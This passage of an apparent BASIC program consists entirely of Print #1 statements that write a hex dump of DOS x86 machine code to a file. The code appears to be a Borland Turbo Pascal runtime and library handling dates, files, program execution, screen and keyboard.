Print #1, "E0B50 9A D1 01 8D 00 BF 4E 08 0E 57 9A EA 07 21 01 75"
Print #1, "E0B60 07 31 C0 9A 16 01 21 01 8D BE 00 FF 16 57 31 C0"
Print #1, "E0B70 50 9A 71 06 21 01 BF 76 06 1E 57 B8 4F 00 50 9A"
Print #1, "E0B80 13 07 21 01 B0 00 50 9A 84 00 8D 00 0E E8 6D FF"
Print #1, "E0B90 0E E8 32 FC 0E E8 87 FD 89 EC 5D 31 C0 9A 16 01"
Print #1, "E0BA0 21 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E0BB0 55 8B EC B4 2A CD 21 32 E4 C4 7E 06 AB 8A C2 C4"
Print #1, "E0BC0 7E 0A AB 8A C6 C4 7E 0E AB 91 C4 7E 12 AB 5D CA"
Print #1, "E0BD0 10 00 55 8B EC 8B 4E 0A 8A 76 08 8A 56 06 B4 2B"
Print #1, "E0BE0 CD 21 5D CA 06 00 55 8B EC B4 2C CD 21 32 E4 8A"
Print #1, "E0BF0 C2 C4 7E 06 AB 8A C6 C4 7E 0A AB 8A C1 C4 7E 0E"
Print #1, "E0C00 AB 8A C5 C4 7E 12 AB 5D CA 10 00 55 8B EC 8A 6E"
Print #1, "E0C10 0C 8A 4E 0A 8A 76 08 8A 56 06 B4 2D CD 21 5D CA"
Print #1, "E0C20 08 00 55 8B EC B8 00 33 CD 21 C4 7E 06 26 88 15"
Print #1, "E0C30 5D CA 04 00 55 8B EC 8A 56 06 B8 01 33 CD 21 5D"
Print #1, "E0C40 CA 02 00 55 8B EC C4 7E 0A 26 8B 1D B8 00 57 CD"
Print #1, "E0C50 21 73 06 33 C9 33 D2 EB 02 33 C0 A3 F4 06 C4 7E"
Print #1, "E0C60 06 FC 91 AB 92 AB 5D CA 08 00 55 8B EC C4 7E 0A"
Print #1, "E0C70 26 8B 1D 8B 4E 06 8B 56 08 B8 01 57 CD 21 72 02"
Print #1, "E0C80 33 C0 A3 F4 06 5D CA 08 00 55 8B EC 83 EC 50 1E"
Print #1, "E0C90 C5 76 0C 8D 7E B0 16 07 FC AC 3C 4F 72 02 B0 4F"
Print #1, "E0CA0 98 91 F3 A4 32 C0 AA C5 56 06 B4 1A CD 21 8D 56"
Print #1, "E0CB0 B0 16 1F 8B 4E 0A B4 4E CD 21 1F C4 7E 06 E8 20"
Print #1, "E0CC0 00 8B E5 5D CA 0A 00 55 8B EC 1E C5 56 06 B4 1A"
Print #1, "E0CD0 CD 21 1F B4 4F CD 21 C4 7E 06 E8 04 00 5D CA 04"
Print #1, "E0CE0 00 72 1E 83 C7 1E 1E 06 1F 32 C0 B9 00 01 FC F2"
Print #1, "E0CF0 AE F6 D1 8A C1 4F 8B F7 4E FD F3 A4 AA FC 1F 33"
Print #1, "E0D00 C0 A3 F4 06 C3 55 8B EC C4 7E 06 FC 8B 46 0C B1"
Print #1, "E0D10 09 D3 E8 05 BC 07 AB 8B 46 0C B1 05 D3 E8 25 0F"
Print #1, "E0D20 00 AB 8B 46 0C 25 1F 00 AB 8B 46 0A B1 0B D3 E8"
Print #1, "E0D30 AB 8B 46 0A B1 05 D3 E8 25 3F 00 AB 8B 46 0A 25"
Print #1, "E0D40 1F 00 D1 E0 AB 5D CA 08 00 55 8B EC 1E C5 76 0A"
Print #1, "E0D50 FC AD 2D BC 07 B1 09 D3 E0 92 AD B1 05 D3 E0 03"
Print #1, "E0D60 D0 AD 03 D0 AD B1 0B D3 E0 93 AD B1 05 D3 E0 03"
Print #1, "E0D70 D8 AD D1 E8 03 C3 1F C4 7E 06 AB 92 AB 5D CA 08"
Print #1, "E0D80 00 55 8B EC 83 EC 20 1E FC C5 76 06 8D 7E E0 16"
Print #1, "E0D90 07 AC 3C 1F 76 02 B0 1F 98 8B C8 40 8B D0 E3 0E"
Print #1, "E0DA0 AC 3C 61 72 06 3C 7A 77 02 2C 20 AA E2 F2 B0 3D"
Print #1, "E0DB0 AA 1F 1E 8E 1E 3E 00 8E 1E 2C 00 33 F6 80 3C 00"
Print #1, "E0DC0 74 11 8D 7E E0 8B CA F3 A6 74 08 4E AC 0A C0 75"
Print #1, "E0DD0 FB EB EA 8B FE 1E 07 32 C0 B9 00 01 F2 AE F6 D1"
Print #1, "E0DE0 C4 7E 0A 8A C1 AA F3 A4 1F 8B E5 5D CA 04 00 55"
Print #1, "E0DF0 8B EC 89 26 F6 06 8C 16 F8 06 81 EC FE 00 8E 1E"
Print #1, "E0E00 3E 00 A1 2C 00 89 46 F2 16 07 FC C5 76 0A 8D 7E"
Print #1, "E0E10 82 AC 3C 4F 72 02 B0 4F 98 91 F3 A4 32 C0 AA C5"
Print #1, "E0E20 76 06 8D BE 02 FF AC 3C 7E 72 02 B0 7E AA 98 91"
Print #1, "E0E30 F3 A4 B0 0D AA 16 1F 8D B6 02 FF 89 76 F4 8C 5E"
Print #1, "E0E40 F6 46 8D 7E E2 89 7E F8 8C 46 FA B8 01 29 CD 21"
Print #1, "E0E50 8D 7E D2 89 7E FC 8C 46 FE B8 01 29 CD 21 8D 56"
Print #1, "E0E60 82 8D 5E F2 B8 00 4B CD 21 72 02 33 C0 BA C2 01"
Print #1, "E0E70 8E DA FA 8B 26 F6 06 8E 16 F8 06 FB A3 F4 06 5D"
Print #1, "E0E80 CA 08 00 B4 4D CD 21 CB BF 0E 09 BE FE 02 B9 13"
Print #1, "E0E90 00 90 FC 2E AC B4 35 CD 21 06 53 1E C5 15 B4 25"
Print #1, "E0EA0 CD 21 1F 8F 05 8F 45 02 83 C7 04 E2 E6 CB 00 02"
Print #1, "E0EB0 1B 21 23 24 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F"
Print #1, "E0EC0 75 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E0ED0 55 89 E5 B8 FF 00 9A 16 01 21 01 5D C3 55 89 E5"
Print #1, "E0EE0 E8 28 00 BF 0E 07 1E 57 0E E8 20 03 BF 0E 07 1E"
Print #1, "E0EF0 57 9A 09 03 21 01 BF 0E 08 1E 57 0E E8 0D 03 BF"
Print #1, "E0F00 0E 08 1E 57 9A 0E 03 21 01 5D CB B4 0F E8 D4 05"
Print #1, "E0F10 3C 07 74 0A 3C 03 76 06 B8 03 00 E8 55 00 E8 9F"
Print #1, "E0F20 00 B4 08 32 FF E8 BC 05 8A C4 24 7F A2 0A 07 A2"
Print #1, "E0F30 00 07 33 C0 A2 FB 06 A2 0B 07 A2 0C 07 40 A2 FA"
Print #1, "E0F40 06 8E 06 4A 00 BF 6C 00 26 8A 1D 26 3A 1D 74 FB"
Print #1, "E0F50 26 8A 1D B8 E4 FF 99 E8 3C 02 F7 D0 F7 D2 B9 37"
Print #1, "E0F60 00 F7 F1 A3 06 07 1E 0E 1F BA 38 01 B8 1B 25 CD"
Print #1, "E0F70 21 1F C3 8E 06 4A 00 26 80 26 87 00 FE 3C 07 74"
Print #1, "E0F80 06 3C 04 72 02 B0 03 50 B4 00 E8 57 05 58 0A E4"
Print #1, "E0F90 74 2D B8 12 11 B3 00 E8 4A 05 B8 30 11 B7 00 B2"
Print #1, "E0FA0 00 E8 40 05 80 FA 2A 75 16 26 80 0E 87 00 01 B8"
Print #1, "E0FB0 00 01 B9 00 06 E8 2C 05 B4 12 B3 20 E8 25 05 C3"
Print #1, "E0FC0 B4 0F E8 1F 05 50 B8 30 11 B7 00 B2 00 E8 14 05"
Print #1, "E0FD0 58 B1 00 0A D2 75 08 B2 18 3C 03 77 02 B1 01 8A"
Print #1, "E0FE0 F2 8A D4 FE CA B4 00 80 FE 18 76 02 B4 01 A3 FE"
Print #1, "E0FF0 06 89 16 08 07 88 0E FD 06 C6 06 FC 06 01 33 C0"
Print #1, "E1000 A3 02 07 89 16 04 07 C3 50 1E B8 C2 01 8E D8 80"
Print #1, "E1010 3E FA 06 00 74 05 C6 06 0C 07 01 1F 58 CF 80 3E"
Print #1, "E1020 0C 07 00 75 01 C3 C6 06 0C 07 00 B4 01 CD 16 74"
Print #1, "E1030 06 B4 00 CD 16 EB F4 B0 5E E8 1D 03 B0 43 E8 18"
Print #1, "E1040 03 E8 0E 03 E9 89 FE 8B DC 36 8B 47 04 E8 23 FF"
Print #1, "E1050 E8 6D FF A0 0A 07 A2 00 07 CA 02 00 8B DC 36 8A"
Print #1, "E1060 57 0A 36 8A 77 08 36 8A 4F 06 36 8A 6F 04 3A D1"
Print #1, "E1070 77 27 3A F5 77 23 FE CA 78 1F FE CE 78 1B FE C9"
Print #1, "E1080 3A 0E 08 07 77 13 FE CD 3A 2E 09 07 77 0B 89 16"
Print #1, "E1090 02 07 89 0E 04 07 E8 41 03 CA 08 00 B8 00 06 8A"
Print #1, "E10A0 3E 00 07 8B 0E 02 07 8B 16 04 07 E8 36 04 8B 16"
Print #1, "E10B0 02 07 E8 25 03 CB E8 1A 03 B8 00 06 8A 3E 00 07"
Print #1, "E10C0 8B CA 8A 16 04 07 E8 1B 04 CB B8 01 07 EB 03 B8"
Print #1, "E10D0 01 06 50 E8 FD 02 58 8A 3E 00 07 8A 0E 02 07 8A"
Print #1, "E10E0 EE 8B 16 04 07 3A EE 75 02 32 C0 E8 F6 03 CB 8B"
Print #1, "E10F0 DC 36 8A 57 06 36 8A 77 04 FE CA 02 16 02 07 72"
Print #1, "E1100 17 3A 16 04 07 77 11 FE CE 02 36 03 07 72 09 3A"
Print #1, "E1110 36 05 07 77 03 E8 C2 02 CA 04 00 E8 B5 02 8A C2"
Print #1, "E1120 2A 06 02 07 FE C0 CB E8 A9 02 8A C6 2A 06 03 07"
Print #1, "E1130 FE C0 CB 8B DC 36 8A 47 04 A8 F0 74 04 24 0F 0C"
Print #1, "E1140 80 80 26 00 07 70 08 06 00 07 CA 02 00 8B DC 36"
Print #1, "E1150 8A 47 04 24 07 B1 04 D2 E0 80 26 00 07 8F 08 06"
Print #1, "E1160 00 07 CA 02 00 80 26 00 07 F7 CB 80 0E 00 07 08"
Print #1, "E1170 CB A0 0A 07 A2 00 07 CB 8B DC 36 8B 4F 04 E3 13"
Print #1, "E1180 8E 06 4A 00 33 FF 26 8A 1D A1 06 07 33 D2 E8 05"
Print #1, "E1190 00 E2 F6 CA 02 00 2D 01 00 83 DA 00 72 05 26 3A"
Print #1, "E11A0 1D 74 F3 C3 8B DC 36 8B 5F 04 B8 DD 34 BA 12 00"
Print #1, "E11B0 3B D3 73 1A F7 F3 8B D8 E4 61 A8 03 75 08 0C 03"
Print #1, "E11C0 E6 61 B0 B6 E6 43 8A C3 E6 42 8A C7 E6 42 CA 02"
Print #1, "E11D0 00 E4 61 24 FC E6 61 CB 80 3E 0B 07 00 75 08 B4"
Print #1, "E11E0 01 CD 16 B0 00 74 02 B0 01 CB A0 0B 07 C6 06 0B"
Print #1, "E11F0 07 00 0A C0 75 12 32 E4 CD 16 0A C0 75 0A 88 26"
Print #1, "E1200 0B 07 0A E4 75 02 B0 03 E8 13 FE CB 8B DC 1E 36"
Print #1, "E1210 C5 7F 04 C7 45 02 B0 D7 C7 45 04 80 00 8D 85 80"
Print #1, "E1220 00 89 45 0C 8C 5D 0E C7 45 10 67 03 8C 4D 12 C6"
Print #1, "E1230 45 30 00 1F CA 04 00 8B DC 1E 36 C5 7F 04 B8 9F"
Print #1, "E1240 03 BB 7D 04 8B CB 81 7D 02 B1 D7 74 0A C7 45 02"
Print #1, "E1250 B2 D7 B8 4C 04 8B D8 89 45 14 8C 4D 16 89 5D 18"
Print #1, "E1260 8C 4D 1A 89 4D 1C 8C 4D 1E 33 C0 1F CA 04 00 55"
Print #1, "E1270 8B EC C4 7E 06 26 8B 55 04 4A 4A 26 8B 75 08 26"
Print #1, "E1280 C4 7D 0C 33 DB C6 06 0B 07 00 0E E8 5C FF B9 01"
Print #1, "E1290 00 3C 08 74 34 3C 13 74 30 3C 04 74 44 49 3C 1B"
Print #1, "E12A0 74 27 3C 01 74 23 3C 06 74 37 3C 1A 74 46 3C 0D"
Print #1, "E12B0 74 4F 3C 20 72 CF 3B DA 74 CB 26 88 01 43 E8 98"
Print #1, "E12C0 00 3B DE 76 C0 8B F3 EB BC 0B DB 74 B8 B0 08 E8"
Print #1, "E12D0 87 00 B0 20 E8 82 00 B0 08 E8 7D 00 4B E2 EA EB"
Print #1, "E12E0 A4 3B DE 74 A0 26 8A 01 3C 20 72 99 E8 6A 00 43"
Print #1, "E12F0 E2 EF EB 91 80 3E FB 06 00 74 8A 26 88 01 43 EB"
Print #1, "E1300 0A E8 4E 00 26 C7 01 0D 0A 43 43 C4 7E 06 33 C0"
Print #1, "E1310 26 89 45 08 26 89 5D 0A 5D CA 04 00 8B DC 36 C4"
Print #1, "E1320 7F 04 26 8B 4D 08 26 29 4D 08 E3 19 26 C4 7D 0C"
Print #1, "E1330 80 3E FC 06 00 75 0B 26 8A 05 E8 1C 00 47 E2 F7"
Print #1, "E1340 EB 03 E8 9C 00 E8 D6 FC 33 C0 CA 04 00 33 C0 CA"
Print #1, "E1350 04 00 B0 0D E8 02 00 B0 0A 53 51 52 06 50 E8 72"
Print #1, "E1360 00 58 3C 07 74 2A 3C 08 74 2D 3C 0D 74 33 3C 0A"
Print #1, "E1370 74 35 B4 09 8A 1E 00 07 32 FF B9 01 00 52 E8 63"
Print #1, "E1380 01 5A FE C2 3A 16 04 07 76 20 8A 16 02 07 EB 17"
Print #1, "E1390 B4 0E E8 4F 01 EB 13 3A 16 02 07 74 0D FE CA EB"
Print #1, "E13A0 09 8A 16 02 07 EB 03 E8 08 00 E8 2D 00 07 5A 59"
Print #1, "E13B0 5B C3 FE C6 3A 36 05 07 76 18 FE CE 51 52 B8 01"
Print #1, "E13C0 06 8A 3E 00 07 8B 0E 02 07 8B 16 04 07 E8 14 01"
Print #1, "E13D0 5A 59 C3 B4 03 32 FF E9 0A 01 B4 02 32 FF E9 03"
Print #1, "E13E0 01 1E 8E 1E 4A 00 8B 16 50 00 1F 8B DA 8B F7 26"
Print #1, "E13F0 8A 05 3C 07 74 21 3C 08 74 2C 3C 0A 74 35 3C 0D"
Print #1, "E1400 74 39 47 FE C2 3A 16 04 07 76 3C E8 6E 00 E8 A1"
Print #1, "E1410 FF 8A 16 02 07 EB 2C E8 62 00 51 52 B8 07 0E E8"
Print #1, "E1420 C2 00 5A 59 EB 1C E8 53 00 3A 16 02 07 74 13 FE"
Print #1, "E1430 CA EB 0F E8 46 00 E8 79 FF EB 07 E8 3E 00 8A 16"
Print #1, "E1440 02 07 47 8B F7 8B DA E2 A6 E8 30 00 1E 8E 1E 4A"
Print #1, "E1450 00 89 16 50 00 8A C6 F6 26 4A 00 32 F6 03 C2 8B"
Print #1, "E1460 C8 8B 16 63 00 B0 0E EE EB 00 8A C5 42 EE EB 00"
Print #1, "E1470 4A B0 0F EE EB 00 8A C1 42 EE 1F C3 3B F7 74 63"
Print #1, "E1480 51 52 57 1E 06 8B CF 2B CE 1E 8E 1E 4A 00 8A C7"
Print #1, "E1490 F6 26 4A 00 32 FF 03 C3 D1 E0 8B F8 8B 16 63 00"
Print #1, "E14A0 83 C2 06 80 3E 49 00 07 1F A1 50 00 75 03 A1 4E"
Print #1, "E14B0 00 8A 1E FD 06 8A 3E 00 07 06 1F 8E C0 FC 0A DB"
Print #1, "E14C0 74 16 AC 8A D8 EC A8 01 75 FB FA EC A8 01 74 FB"
Print #1, "E14D0 8B C3 AB FB E2 EC EB 06 8A E7 AC AB E2 FC 07 1F"
Print #1, "E14E0 5F 5A 59 C3 56 57 55 06 CD 10 07 5D 5F 5E C3 00"
Print #1, "E14F0 BA C2 01 8E DA 8C 06 3E 00 33 ED E8 E9 09 E8 A0"
Print #1, "E1500 00 8B C4 05 13 00 B1 04 D3 E8 8C D2 03 C2 A3 10"
Print #1, "E1510 00 A3 12 00 03 06 0A 00 A3 14 00 A3 1E 00 A3 22"
Print #1, "E1520 00 A3 2A 00 8E 06 3E 00 26 A1 02 00 A3 26 00 C7"
Print #1, "E1530 06 30 00 D6 00 8C 0E 32 00 BF 0E 09 BE 39 02 B9"
Print #1, "E1540 13 00 90 FC 2E AC B4 35 CD 21 89 1D 8C 45 02 83"
Print #1, "E1550 C7 04 E2 EF 1E 0E 1F BA 0C 01 B8 00 25 CD 21 BA"
Print #1, "E1560 13 01 B8 23 25 CD 21 BA DB 00 B8 24 25 CD 21 BA"
Print #1, "E1570 04 01 B8 3F 25 CD 21 1F B8 0E 07 1E 50 1E 50 B8"
Print #1, "E1580 63 02 0E 50 0E E8 F3 01 0E E8 6D 02 B8 0E 08 1E"
Print #1, "E1590 50 1E 50 B8 63 02 0E 50 0E E8 DF 01 0E E8 5E 02"
Print #1, "E15A0 CB 33 C0 9C 5B 80 E7 0F 53 9D 9C 59 80 E5 F0 80"
Print #1, "E15B0 FD F0 74 0E 40 80 CF F0 53 9D 9C 59 80 E5 F0 74"
Print #1, "E15C0 01 40 A2 52 00 C3 33 C0 CA 02 00 FB 83 C4 06 58"
Print #1, "E15D0 83 E7 1F 81 C7 96 00 80 FC 39 73 03 BF FF FF 57"
Print #1, "E15E0 B4 54 CD 21 8B EC 80 4E 16 01 58 5B 59 5A 5E 5F"
Print #1, "E15F0 5D 1F 07 CF B8 D0 00 83 C4 06 EB 03 B8 C8 00 59"
Print #1, "E1600 5B EB 07 B8 FF 00 33 C9 33 DB BA C2 01 8E DA FB"
Print #1, "E1610 A3 38 00 8B C1 0B C3 74 3D A1 16 00 0B C0 74 2F"
Print #1, "E1620 8E C0 26 A1 10 00 0B C0 74 1B 2B C3 77 17 F7 D8"
Print #1, "E1630 3D 00 10 73 10 BA 10 00 F7 E2 03 C1 72 07 26 3B"
Print #1, "E1640 06 08 00 72 06 26 A1 14 00 EB D1 8B C8 8C C3 2B"
Print #1, "E1650 1E 3E 00 83 EB 10 89 0E 3A 00 89 1E 3C 00 C4 1E"
Print #1, "E1660 34 00 8C C0 0B C3 74 13 33 C0 A3 34 00 A3 36 00"
Print #1, "E1670 A3 42 00 B8 6E 01 0E 50 06 53 CB B8 0E 07 1E 50"
Print #1, "E1680 0E E8 CF 01 B8 0E 08 1E 50 0E E8 C6 01 BF 0E 09"
Print #1, "E1690 BE 39 02 B9 13 00 90 FC 2E AC B4 25 1E C5 15 CD"
Print #1, "E16A0 21 1F 83 C7 04 E2 F0 A1 3A 00 0B 06 3C 00 74 29"
Print #1, "E16B0 BB 4C 02 E8 2A 00 A1 38 00 E8 32 00 BB 5B 02 E8"
Print #1, "E16C0 1E 00 A1 3C 00 E8 40 00 B0 3A E8 55 00 A1 3A 00"
Print #1, "E16D0 E8 35 00 BB 60 02 E8 07 00 A1 38 00 B4 4C CD 21"
Print #1, "E16E0 2E 8A 07 0A C0 74 06 E8 38 00 43 EB F3 C3 B1 64"
Print #1, "E16F0 E8 07 00 B1 0A E8 02 00 EB 04 32 E4 F6 F1 04 30"
Print #1, "E1700 50 E8 1E 00 58 8A C4 C3 50 8A C4 E8 01 00 58 50"
Print #1, "E1710 B1 04 D2 E8 E8 03 00 58 24 0F 04 30 3C 3A 72 02"
Print #1, "E1720 04 07 8A D0 B4 06 CD 21 C3 00 02 1B 21 23 24 34"
Print #1, "E1730 35 36 37 38 39 3A 3B 3C 3D 3E 3F 75 52 75 6E 74"
Print #1, "E1740 69 6D 65 20 65 72 72 6F 72 20 00 20 61 74 20 00"
Print #1, "E1750 2E 0D 0A 00 50 6F 72 74 69 6F 6E 73 20 43 6F 70"
Print #1, "E1760 79 72 69 67 68 74 20 28 63 29 20 31 39 38 33 2C"
Print #1, "E1770 39 32 20 42 6F 72 6C 61 6E 64 BA 33 D2 8B DC 1E"
Print #1, "E1780 36 C4 7F 08 36 C5 77 04 FC 33 C0 AB B8 B0 D7 AB"
Print #1, "E1790 B8 80 00 AB 33 C0 AB AB AB 8D 45 74 AB 8C C0 AB"
Print #1, "E17A0 B8 10 09 AB B8 21 01 AB 33 C0 B9 0E 00 F3 AB B9"
Print #1, "E17B0 4F 00 0B D2 75 09 AC 3A C8 76 04 8A C8 E3 08 AC"
Print #1, "E17C0 0A C0 74 03 AA E2 F8 32 C0 AA 1F CA 08 00 8B DC"
Print #1, "E17D0 36 C4 7F 0A 36 8B 47 04 26 89 45 04 36 8B 47 06"
Print #1, "E17E0 26 89 45 0C 36 8B 47 08 26 89 45 0E 33 C0 26 89"
Print #1, "E17F0 45 08 26 89 45 0A CA 0A 00 BA B1 D7 EB 08 BA B2"
Print #1, "E1800 D7 EB 03 BA B3 D7 55 8B EC C4 7E 06 26 8B 45 02"
Print #1, "E1810 3D B1 D7 74 12 3D B2 D7 74 0D 3D B0 D7 74 10 C7"
Print #1, "E1820 06 42 00 66 00 EB 24 52 06 57 0E E8 25 00 5A 33"
Print #1, "E1830 C0 26 89 55 02 26 89 45 08 26 89 45 0A BB 10 00"
Print #1, "E1840 E8 4C 00 74 06 26 C7 45 02 B0 D7 5D CA 04 00 B0"
Print #1, "E1850 00 EB 02 B0 01 55 8B EC C4 7E 06 26 81 7D 02 B1"
Print #1, "E1860 D7 74 18 26 81 7D 02 B2 D7 74 08 C7 06 42 00 67"
Print #1, "E1870 00 EB 18 50 BB 14 00 E8 15 00 58 0A C0 74 0C BB"
Print #1, "E1880 1C 00 E8 0A 00 26 C7 45 02 B0 D7 5D CA 04 00 06"
Print #1, "E1890 57 06 57 26 FF 19 0B C0 74 03 A3 42 00 5F 07 C3"
Print #1, "E18A0 8B DC 1E 36 C4 7F 04 26 C5 55 0C 26 8B 4D 04 26"
Print #1, "E18B0 8B 1D B4 3F CD 21 72 10 26 89 45 0A 33 C0 26 C7"
Print #1, "E18C0 45 08 00 00 1F CA 04 00 26 C7 45 0A 00 00 EB EE"
Print #1, "E18D0 8B DC 1E 36 C4 7F 04 26 C5 55 0C 33 C9 26 87 4D"
Print #1, "E18E0 08 26 8B 1D B4 40 CD 21 72 07 2B C1 74 03 B8 65"
Print #1, "E18F0 00 1F CA 04 00 8B DC 1E 36 C4 7F 04 26 C5 55 0C"
Print #1, "E1900 33 C9 26 87 4D 08 26 8B 1D B4 40 CD 21 72 02 33"
Print #1, "E1910 C0 1F CA 04 00 8B DC 36 C4 7F 04 26 8B 1D 83 FB"
Print #1, "E1920 04 76 06 B4 3E CD 21 72 02 33 C0 CA 04 00 BA 33"
Print #1, "E1930 D2 8B DC 1E 36 C4 7F 08 36 C5 77 04 FC 33 C0 AB"
Print #1, "E1940 B8 B0 D7 AB 33 C0 B9 16 00 F3 AB B9 4F 00 0B D2"
Print #1, "E1950 75 09 AC 3A C8 76 04 8A C8 E3 08 AC 0A C0 74 03"
Print #1, "E1960 AA E2 F8 32 C0 AA 1F CA 08 00 A0 54 00 B4 3D 33"
Print #1, "E1970 D2 EB 06 B8 00 3C BA 01 00 55 8B EC C4 7E 08 26"
Print #1, "E1980 81 7D 02 B0 D7 74 1A 26 81 7D 02 B3 D7 74 08 C7"
Print #1, "E1990 06 42 00 66 00 EB 34 50 52 06 57 0E E8 4C 00 5A"
Print #1, "E19A0 58 26 80 7D 30 00 74 12 1E 8D 55 30 06 1F 33 C9"
Print #1, "E19B0 CD 21 1F 73 06 A3 42 00 EB 11 92 26 C7 45 02 B3"
Print #1, "E19C0 D7 26 89 05 8B 46 06 26 89 45 04 5D CA 06 00 8B"
Print #1, "E19D0 DC 36 C4 7F 04 E8 38 00 75 0E 33 C9 26 8B 1D B4"
Print #1, "E19E0 40 CD 21 73 03 A3 42 00 CA 04 00 8B DC 36 C4 7F"
Print #1, "E19F0 04 E8 1C 00 75 17 26 8B 1D 83 FB 04 76 09 B4 3E"
Print #1, "E1A00 CD 21 73 03 A3 42 00 26 C7 45 02 B0 D7 CA 04 00"
Print #1, "E1A10 26 81 7D 02 B3 D7 74 06 C7 06 42 00 67 00 C3 B4"
Print #1, "E1A20 3F BA 64 00 EB 05 B4 40 BA 65 00 55 8B EC C4 7E"
Print #1, "E1A30 0A E8 DC FF 75 1B 1E 52 C5 56 06 26 8B 4D 04 26"
Print #1, "E1A40 8B 1D CD 21 5A 1F 72 06 3B C1 74 05 8B C2 A3 42"
Print #1, "E1A50 00 5D CA 04 00 B3 3F B9 64 00 EB 05 B3 40 B9 65"
Print #1, "E1A60 00 55 8B EC C4 7E 10 E8 A6 FF 75 3F 8B 46 0A 0B"
Print #1, "E1A70 C0 74 1C 1E 51 26 F7 65 04 8B C8 C5 56 0C 8A E3"
Print #1, "E1A80 26 8B 1D CD 21 59 1F 72 1F 33 D2 26 F7 75 04 C4"
Print #1, "E1A90 7E 06 8C C2 0B D7 74 05 26 89 05 EB 1C 3B 46 0A"
Print #1, "E1AA0 74 17 89 0E 42 00 EB 11 A3 42 00 C4 7E 06 8C C2"
Print #1, "E1AB0 0B D7 74 05 33 C0 26 89 05 5D CA 0E 00 55 8B EC"
Print #1, "E1AC0 C4 7E 0A E8 4A FF 75 21 8B 46 08 26 F7 65 04 8B"
Print #1, "E1AD0 C8 8B 46 06 26 F7 65 04 03 CA 8B D0 26 8B 1D B8"
Print #1, "E1AE0 00 42 CD 21 73 03 A3 42 00 5D CA 08 00 8B DC 1E"
Print #1, "E1AF0 36 C5 57 04 83 C2 30 B4 41 CD 21 1F 73 03 A3 42"
Print #1, "E1B00 00 CA 04 00 BA 33 D2 55 8B EC 83 EC 50 1E C5 76"
Print #1, "E1B10 06 8D 7E B0 16 07 FC B9 4F 00 0B D2 75 09 AC 3A"
Print #1, "E1B20 C8 76 04 8A C8 E3 08 AC 0A C0 74 03 AA E2 F8 32"
Print #1, "E1B30 C0 AA C5 56 0A 83 C2 30 8D 7E B0 B4 56 CD 21 1F"
Print #1, "E1B40 73 05 A3 42 00 EB 14 1E 8D 76 B0 16 1F C4 7E 0A"
Print #1, "E1B50 83 C7 30 FC AC AA 0A C0 75 FA 1F 8B E5 5D CA 08"
Print #1, "E1B60 00 55 8B EC 8B 56 06 0B D2 74 05 E8 49 00 EB 30"
Print #1, "E1B70 B4 30 CD 21 3C 03 B8 00 00 72 25 8E 06 3E 00 26"
Print #1, "E1B80 8E 06 2C 00 33 FF FC 26 3A 05 74 07 B9 FF FF F2"
Print #1, "E1B90 AE EB F4 83 C7 03 8B F7 B9 00 01 F2 AE 91 F6 D0"
Print #1, "E1BA0 1E 06 1F C4 7E 08 FC AA 91 F3 A4 1F 5D CA 02 00"
Print #1, "E1BB0 33 D2 E8 02 00 93 CB 8E 06 3E 00 BF 80 00 26 8A"
Print #1, "E1BC0 0D 32 ED 47 33 DB E3 09 26 80 3D 20 77 03 47 E2"
Print #1, "E1BD0 F7 8B F7 E3 09 26 80 3D 20 76 03 47 E2 F7 8B C7"
Print #1, "E1BE0 2B C6 74 04 43 4A 75 DE C3 FC 8B DC 8C DA 36 C4"
Print #1, "E1BF0 7F 08 36 C5 77 04 AC AA 8A C8 32 ED F3 A4 8E DA"
Print #1, "E1C00 CA 04 00 FC 8B DC 8C DA 36 C5 77 0A 36 C4 7F 06"
Print #1, "E1C10 36 8B 4F 04 AC 3A C1 76 02 8A C1 AA 8A C8 32 ED"
Print #1, "E1C20 F3 A4 8E DA CA 0A 00 FC 8B DC 8C DA 36 C4 7F 0C"
Print #1, "E1C30 36 C5 77 08 8A 04 32 E4 36 8B 4F 06 0B C9 7F 03"
Print #1, "E1C40 B9 01 00 03 F1 2B C1 72 13 40 36 8B 4F 04 0B C9"
Print #1, "E1C50 7D 02 33 C9 3B C1 76 06 8B C1 EB 02 33 C0 AA 8B"
Print #1, "E1C60 C8 F3 A4 8E DA CA 08 00 FC 8B DC 8C DA 36 C4 7F"
Print #1, "E1C70 08 36 C5 77 04 26 8A 0D 32 ED AC 26 00 05 73 08"
Print #1, "E1C80 26 C6 05 FF 8A C1 F6 D0 03 F9 47 8A C8 F3 A4 8E"
Print #1, "E1C90 DA CA 04 00 55 8B EC 1E C5 76 0A FC AC 0A C0 74"
Print #1, "E1CA0 2C 8A D0 32 F6 C4 7E 06 26 8A 0D 32 ED 2B CA 72"
Print #1, "E1CB0 1C 41 47 AC F2 AE 75 15 8B C7 8B D9 8B CA 49 F3"
Print #1, "E1CC0 A6 74 0E 8B F8 8B CB 8B 76 0A 46 EB E6 33 C0 EB"
Print #1, "E1CD0 04 48 2B 46 06 1F 5D CA 08 00 FC 8B DC 8C DA 36"
Print #1, "E1CE0 C5 77 08 36 C4 7F 04 AC 26 8A 25 47 8A C8 3A CC"
Print #1, "E1CF0 76 02 8A CC 0A C9 74 06 32 ED F3 A6 75 02 3A C4"
Print #1, "E1D00 8E DA CA 08 00 FC 8B DC 36 C4 7F 06 B0 01 AA 36"
Print #1, "E1D10 8A 47 04 AA CA 02 00 FC 8B DC 8C DA 36 C4 7F 0A"
Print #1, "E1D20 36 C5 77 06 36 8B 47 04 AA 8B C8 F3 A4 8E DA CA"
Print #1, "E1D30 06 00 55 8B EC 81 EC 00 02 83 7E 06 01 7D 05 C7"
Print #1, "E1D40 46 06 01 00 8D BE 00 FF 16 57 C4 7E 0A 06 57 B8"
Print #1, "E1D50 01 00 50 8B 46 06 48 50 0E E8 CB FE C4 7E 0E 06"
Print #1, "E1D60 57 0E E8 03 FF 8D BE 00 FE 16 57 C4 7E 0A 06 57"
Print #1, "E1D70 FF 76 06 B8 FF 00 50 0E E8 AC FE 0E E8 E9 FE C4"
Print #1, "E1D80 7E 0A 06 57 FF 76 08 0E E8 78 FE 8B E5 5D CA 0C"
Print #1, "E1D90 00 55 8B EC 81 EC 00 02 83 7E 06 00 7E 5C 83 7E"
Print #1, "E1DA0 08 00 7E 56 81 7E 08 FF 00 7F 4F 81 7E 06 FF 00"
Print #1, "E1DB0 7E 05 C7 46 06 FF 00 8D BE 00 FF 16 57 C4 7E 0A"
Print #1, "E1DC0 06 57 B8 01 00 50 8B 46 08 48 50 0E E8 58 FE 8D"
